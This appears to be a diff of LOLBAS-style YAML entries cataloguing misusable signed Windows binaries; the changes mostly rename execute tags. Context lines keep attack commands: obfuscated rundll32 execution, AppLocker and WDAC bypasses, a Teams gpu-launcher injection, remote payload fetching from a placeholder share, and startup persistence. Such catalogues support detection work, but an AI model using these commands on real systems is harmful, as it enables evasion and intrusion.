MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: URL
- Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable by calling OpenURL. Description: Launch an executable by calling OpenURL.
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
- Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1

View File

@ -12,7 +12,6 @@ Commands:
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags: Tags:
- Execute: EXE
- Execute: CMD - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1216.002 MitreID: T1216.002
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.vbs - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Code_Sample: Code_Sample:

View File

@ -32,8 +32,7 @@ Commands:
MitreID: T1220 MitreID: T1220
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: CMD - Execute: XSL
- Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\System32\winrm.vbs
- Path: C:\Windows\SysWOW64\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code to bypass AppLocker. Usecase: Local execution of managed code to bypass AppLocker.
@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
Usecase: Execute a provided EXE Usecase: Execute a provided EXE

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: Csharp - Execute: CSharp
Full_Path: Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
- Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 7 and up with VS/VScode installed OperatingSystem: Windows 7 and up with VS/VScode installed
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
Description: The above binary will execute other binary. Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments. Usecase: Execute any binary with given arguments.
@ -21,7 +21,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 7 and up with VS/VScode installed OperatingSystem: Windows 7 and up with VS/VScode installed
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: 'c:\windows\system32\devtoolslauncher.exe' - Path: 'c:\windows\system32\devtoolslauncher.exe'
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: Csharp - Execute: CSharp
Full_Path: Full_Path:
- Path: no default - Path: no default
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 7 and up with .NET installed OperatingSystem: Windows 7 and up with .NET installed
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Command: dotnet.exe [PATH_TO_DLL] - Command: dotnet.exe [PATH_TO_DLL]
Description: dotnet.exe will execute any DLL. Description: dotnet.exe will execute any DLL.
Usecase: Execute DLL Usecase: Execute DLL
@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 7 and up with .NET installed OperatingSystem: Windows 7 and up with .NET installed
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Command: dotnet.exe fsi - Command: dotnet.exe fsi
Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands
Usecase: Execute arbitrary F# code Usecase: Execute arbitrary F# code
@ -30,7 +30,7 @@ Commands:
MitreID: T1059 MitreID: T1059
OperatingSystem: Windows 10 and up with .NET SDK installed OperatingSystem: Windows 10 and up with .NET SDK installed
Tags: Tags:
- Execute: Fsharp - Execute: FSharp
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
Usecase: Execute code bypassing AWL Usecase: Execute code bypassing AWL
@ -39,7 +39,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 and up with .NET Core installed OperatingSystem: Windows 10 and up with .NET Core installed
Tags: Tags:
- Execute: CSProj - Execute: CSharp
Full_Path: Full_Path:
- Path: 'C:\Program Files\dotnet\dotnet.exe' - Path: 'C:\Program Files\dotnet\dotnet.exe'
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1059 MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags: Tags:
- Execute: Fsharp - Execute: FSharp
- Command: fsi.exe - Command: fsi.exe
Description: Execute F# code via interactive command line Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
@ -21,7 +21,7 @@ Commands:
MitreID: T1059 MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags: Tags:
- Execute: Fsharp - Execute: FSharp
Full_Path: Full_Path:
- Path: C:\Program Files\dotnet\sdk\<version>\FSharp\fsi.exe - Path: C:\Program Files\dotnet\sdk\<version>\FSharp\fsi.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1059 MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags: Tags:
- Execute: Fsharp - Execute: FSharp
- Command: fsianycpu.exe - Command: fsianycpu.exe
Description: Execute F# code via interactive command line Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
@ -21,7 +21,7 @@ Commands:
MitreID: T1059 MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags: Tags:
- Execute: Fsharp - Execute: FSharp
Full_Path: Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: Csharp - Execute: CSharp
- Command: rcsi.exe bypass.csx - Command: rcsi.exe bypass.csx
Description: Use embedded C# within the csx script to execute the code. Description: Use embedded C# within the csx script to execute the code.
Usecase: Local execution of arbitrary C# code stored in local CSX file. Usecase: Local execution of arbitrary C# code stored in local CSX file.
@ -21,7 +21,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: Csharp - Execute: CSharp
Full_Path: Full_Path:
- Path: no default - Path: no default
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
- Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: Javascript - Execute: Node.JS
- Command: teams.exe - Command: teams.exe
Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing. Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing.
Usecase: Execute JavaScript code Usecase: Execute JavaScript code
@ -21,7 +21,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: Javascript - Execute: Node.JS
- Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command
Usecase: Executes a process under a trusted Microsoft signed binary Usecase: Executes a process under a trusted Microsoft signed binary

View File

@ -79,7 +79,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags: Tags:
- Execute: Nuget - Execute: CMD
- Execute: Remote - Execute: Remote
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
@ -109,7 +109,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: Update.exe --createShortcut=payload.exe -l=Startup - Command: Update.exe --createShortcut=payload.exe -l=Startup
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Usecase: Execute binary Usecase: Execute binary

View File

@ -21,7 +21,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Tags: Tags:
- Execute: Csharp - Execute: XOML
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Code_Sample: Code_Sample:

View File

@ -21,7 +21,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10, Windows Server 2019, Windows 11 OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: wsl.exe --exec bash -c "<command>" - Command: wsl.exe --exec bash -c "<command>"
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`) Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
Usecase: Performs execution of arbitrary Linux commands. Usecase: Performs execution of arbitrary Linux commands.